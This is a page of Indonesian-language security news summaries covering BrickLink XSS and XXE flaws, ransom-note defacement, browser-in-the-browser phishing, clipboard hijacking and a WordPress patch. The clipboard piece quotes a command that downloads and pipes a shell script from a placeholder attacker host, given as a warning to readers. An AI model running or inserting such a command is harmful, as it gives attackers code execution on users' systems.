Web

Bug LEGO BrickLink memungkinkan peretas membajak akun, merusak server

December 18, 2022 by Søren

Analis keamanan telah menemukan dua kerentanan keamanan API di BrickLink.com, pasar barang bekas dan vintage resmi LEGO Group untuk batu bata LEGO.

BrickLink adalah komunitas online penggemar LEGO terbesar di dunia, dengan lebih dari satu juta anggota terdaftar.

Dua masalah keamanan API yang ditemukan oleh Salt Security dapat memungkinkan penyerang mengambil alih akun anggota, mengakses dan mencuri informasi identitas pribadi (PII) yang disimpan di platform, atau bahkan mendapatkan akses ke data produksi internal dan membahayakan server internal.

Analis Salt Security menemukan kerentanan saat bereksperimen dengan bidang masukan pengguna di situs web BrickLink.

Yang pertama adalah cacat cross-site scripting (XSS) di kotak dialog “Temukan Nama Pengguna” di bagian pencarian kupon, yang memungkinkan penyerang menyuntikkan dan mengeksekusi kode pada mesin target menggunakan tautan yang dibuat khusus.

Menggunakan ID Sesi target yang diekspos di halaman berbeda, penyerang dapat memanfaatkan kelemahan XSS untuk membajak sesi dan mengambil alih akun target.

Mengakses akun berarti membuka semua data yang disimpan di platform, termasuk detail pribadi, alamat email, alamat pengiriman, riwayat pesanan, kupon, umpan balik yang diterima, item yang diinginkan, dan riwayat pesan.

Cacat kedua terletak pada halaman “Unggah ke Daftar Dicari”, di mana pengguna dapat mengunggah daftar XML yang berisi bagian LEGO yang ingin mereka temukan dan beli.

Dengan mengeksploitasi kelemahan dalam mekanisme penguraian titik akhir, analis Salt Security meluncurkan serangan injeksi Entitas Eksternal XML (XXE) yang berhasil, menambahkan referensi ke entitas eksternal pada file mereka.

Serangan XXE memungkinkan mereka untuk membaca file di server web dan mengeksekusi serangan pemalsuan permintaan sisi server (SSRF), yang dapat menyebabkan pengusiran token AWS EC2 untuk server.

Selengkapnya: Bleeping Computer

Geng Ransomware sekarang meretas situs web perusahaan untuk menampilkan catatan tebusan

June 3, 2022 by Eevee

Geng ransomware membawa pemerasan ke tingkat yang baru dengan meretas situs web perusahaan secara publik untuk menampilkan catatan tebusan secara publik.

Strategi pemerasan baru ini dilakukan oleh Industrial Spy, geng pemerasan data yang baru-baru ini mulai menggunakan ransomware sebagai bagian dari serangan mereka.

Sebagai bagian dari serangan mereka, Industrial Spy akan menembus jaringan, mencuri data, dan menyebarkan ransomware di perangkat. Pelaku ancaman kemudian mengancam akan menjual data yang dicuri di pasar Tor mereka jika uang tebusan tidak dibayarkan.

Contoh catatan tebusan mata-mata industri
Sumber: BleepingComputer

Hari ini, Industrial Spy mulai menjual data yang mereka klaim dicuri dari perusahaan Prancis bernama SATT Sud-Est seharga $500.000.

Seperti yang pertama kali diketahui oleh peneliti keamanan MalwareHunterTeam, serangan ini menonjol karena pelaku juga meretas situs web perusahaan untuk menampilkan pesan peringatan bahwa 200GB telah dicuri dan akan segera dijual jika korban tidak membayar uang tebusan.

SATT Sud-Est dirusak untuk menunjukkan catatan tebusan
Sumber: BleepingComputer

Ketika geng ransomware memeras korban, mereka biasanya memberi mereka waktu singkat, biasanya beberapa minggu, untuk bernegosiasi dan membayar uang tebusan sebelum mereka mulai membocorkan data.

Selama proses negosiasi ini, pelaku ancaman berjanji untuk merahasiakan serangan, memberikan kunci dekripsi, dan menghapus semua data jika uang tebusan dibayarkan.

Setelah periode ini, pelaku ancaman akan menggunakan berbagai metode untuk meningkatkan tekanan, termasuk serangan DDoS di situs web perusahaan, mengirim email kepada pelanggan dan mitra bisnis, dan menelepon eksekutif dengan ancaman.

Taktik ini semua dilakukan secara pribadi atau dengan eksposur minimal di situs kebocoran data mereka, yang biasanya hanya dikunjungi oleh peneliti keamanan siber dan media.

Sementara taktik ini di luar norma, memungkinkan geng ransomware untuk memberikan tekanan lebih lanjut pada korban, karena mendorong serangan menjadi sorotan di mana pelanggan dan mitra bisnis dapat lebih mudah melihatnya.

Namun, tidak diyakini bahwa taktik baru ini akan digunakan secara luas karena server web biasanya tidak di-host di jaringan perusahaan melainkan dengan penyedia hosting.

Oleh karena itu, pelaku ancaman perlu menemukan kerentanan di situs web atau mendapatkan akses ke kredensial saat mereka mencuri data dari jaringan internal.

Sumber: Bleeping Computer

Serangan Browser-in-the Browser (BITB) Baru Membuat Phishing Hampir Tidak Terdeteksi

March 22, 2022 by Eevee

Teknik phishing baru yang disebut serangan browser-in-the-browser (BitB) dapat dimanfaatkan untuk mensimulasikan jendela browser di dalam browser untuk menipu domain yang sah, sehingga memungkinkan untuk melakukan serangan phishing yang meyakinkan.

Menurut penguji penetrasi dan peneliti keamanan, yang menggunakan pegangan mrd0x_, metode ini memanfaatkan opsi masuk tunggal (SSO) pihak ketiga yang disematkan di situs web seperti “Masuk dengan Google” (atau Facebook, Apple, atau Microsoft ).

Sementara perilaku default ketika pengguna mencoba untuk masuk melalui metode ini akan disambut oleh jendela pop-up untuk menyelesaikan proses otentikasi, serangan BitB bertujuan untuk mereplikasi seluruh proses ini menggunakan campuran kode HTML dan CSS untuk membuat jendela browser yang sepenuhnya dibuat-buat.

“Gabungkan desain jendela dengan iframe yang menunjuk ke server jahat yang menghosting halaman phishing, dan itu pada dasarnya tidak dapat dibedakan,” kata mrd0x_ dalam penulisan teknis yang diterbitkan minggu lalu. “JavaScript dapat dengan mudah digunakan untuk membuat jendela muncul pada tautan atau klik tombol, pada pemuatan halaman, dll.”

Meskipun metode ini secara signifikan mempermudah pemasangan kampanye manipulasi psikologis yang efektif, perlu diperhatikan bahwa calon korban perlu dialihkan ke domain phishing yang dapat menampilkan jendela autentikasi palsu untuk pengambilan kredensial.

“Tapi begitu mendarat di situs web milik penyerang, pengguna akan merasa nyaman saat mereka mengetikkan kredensial mereka di situs yang tampaknya sah (karena URL yang dapat dipercaya mengatakan demikian),” tambah mrd0x_.

Sumber : The Hacker News

Jangan salin tempel perintah dari halaman web — Anda bisa diretas

January 4, 2022 by Eevee

Baru-baru ini, Gabriel Friedlander, pendiri platform pelatihan kesadaran keamanan Wizer mendemonstrasikan peretasan yang jelas namun mengejutkan yang akan membuat Anda berhati-hati dalam menyalin-menempelkan perintah dari halaman web.

Friedlander memperingatkan sebuah halaman web dapat secara diam-diam mengganti konten dari apa yang ada di clipboard Anda, dan yang lebih buruk lagi pengembang mungkin hanya menyadari kesalahan mereka setelah menempelkan teks, dan pada saat itu mungkin sudah terlambat.

Dalam bukti konsep sederhana (PoC) yang diterbitkan di blognya, Friedlander meminta pembaca untuk menyalin perintah sederhana yang akan dikenal oleh sebagian besar sysadmin dan pengembang:

Halaman HTML Friedlander dengan perintah sederhana yang dapat Anda salin ke clipboard

Sekarang, tempelkan apa yang Anda salin dari blog Friedlander ke dalam kotak teks atau Notepad, dan hasilnya mungkin akan membuat Anda terkejut:

curl http://attacker-domain:8000/shell.sh | SH

Anda tidak hanya mendapatkan perintah yang sama sekali berbeda di clipboard Anda, tetapi untuk memperburuk keadaan, ia memiliki karakter baris baru (atau kembali) di akhir.

Mereka yang menempelkan teks mungkin mendapat kesan bahwa mereka menyalin perintah sudo apt update yang familier dan tidak berbahaya yang digunakan untuk mengambil informasi terbaru pada perangkat lunak yang diinstal pada sistem Anda.

Keajaibannya ada pada kode JavaScript yang tersembunyi di balik pengaturan halaman HTML PoC oleh Friedlander. Setelah Anda menyalin teks “sudo apt update” yang terdapat dalam elemen HTML, cuplikan kode, yang ditampilkan di bawah ini berjalan.

Apa yang terjadi setelahnya adalah ‘pendengar acara’ JavaScript yang menangkap peristiwa penyalinan dan mengganti data papan klip dengan kode uji berbahaya Friedlander:

Kode JavaScript PoC yang menggantikan konten clipboard

“Inilah mengapa Anda TIDAK PERNAH menyalin perintah tempel langsung ke terminal Anda,” Friedlander memperingatkan.

“Anda pikir Anda menyalin satu hal, tetapi itu diganti dengan sesuatu yang lain, seperti kode berbahaya. Yang diperlukan hanyalah satu baris kode yang disuntikkan ke dalam kode yang Anda salin untuk membuat pintu belakang ke aplikasi Anda.”

Seorang pengguna Reddit juga menyajikan contoh alternatif dari trik ini yang tidak memerlukan JavaScript: teks tak terlihat yang dibuat dengan gaya HTML dan CSS yang disalin ke clipboard Anda saat Anda menyalin bagian teks yang terlihat:

HTML yang tidak terlihat (kiri) diambil selama salin-tempel dan memiliki garis tambahan (kanan)

“Masalahnya bukan hanya situs web dapat mengubah konten clipboard Anda menggunakan JavaScript,” jelas pengguna, SwallowYourDreams.

“Bisa juga hanya menyembunyikan perintah dalam HTML yang tidak terlihat oleh mata manusia, tetapi akan disalin oleh komputer.”

Jadi, alasan lain untuk tidak pernah secara membabi buta mempercayai apa yang Anda salin dari halaman web—lebih baik tempel di editor teks terlebih dahulu.

Sumber : Bleeping Computer

WordPress Menambal Bug RCE Keparahan Tinggi Berusia 3 Tahun

November 2, 2020 by Winnie the Pooh

WordPress merilis pembaruan 5.5.2 untuk platform perangkat lunak penerbitan web nya.

Pembaruan ini menambal bug dengan tingkat keparahan tinggi, yang dapat memungkinkan penyerang jauh yang tidak diautentikasi untuk mengambil alih situs web yang ditargetkan melalui serangan denial-of-service yang telah disesuaikan.

Secara keseluruhan, Rilis Keamanan dan Pemeliharaan WordPress menangani 10 bug keamanan dan juga membawa banyak peningkatan fitur ke platform. WordPress mengatakan pembaruan tersebut adalah “rilis keamanan dan pemeliharaan siklus pendek” sebelum rilis utama berikutnya versi 5.6. Dengan pembaruan ini, semua versi sejak WordPress 3.7 juga akan menjadi yang terbaru.

Peneliti yang menemukan bug tersebut, Omar Ganiev, pendiri DeteAct, mengatakan kepada Threatpost bahwa dampak kerentanan mungkin tinggi, tetapi kemungkinan musuh dapat mereproduksi serangan di alam liar rendah.

Baik WordPress maupun Ganiev tidak percaya bahwa kerentanan telah dieksploitasi di alam liar.

Berita selengkapnya dapat dibaca pada tautan di bawah ini;
Source: The Threat Post

Cookie	Duration	Description
_ga	2 years	The _ga cookie, installed by Google Analytics, calculates visitor, session and campaign data and also keeps track of site usage for the site's analytics report. The cookie stores information anonymously and assigns a randomly generated number to recognize unique visitors.
_gat_gtag_UA_172707709_1	1 minute	Set by Google to distinguish users.
_gid	1 day	Installed by Google Analytics, _gid cookie stores information on how visitors use a website, while also creating an analytics report of the website's performance. Some of the data that are collected include the number of visitors, their source, and the pages they visit anonymously.

Web

Cookies Settings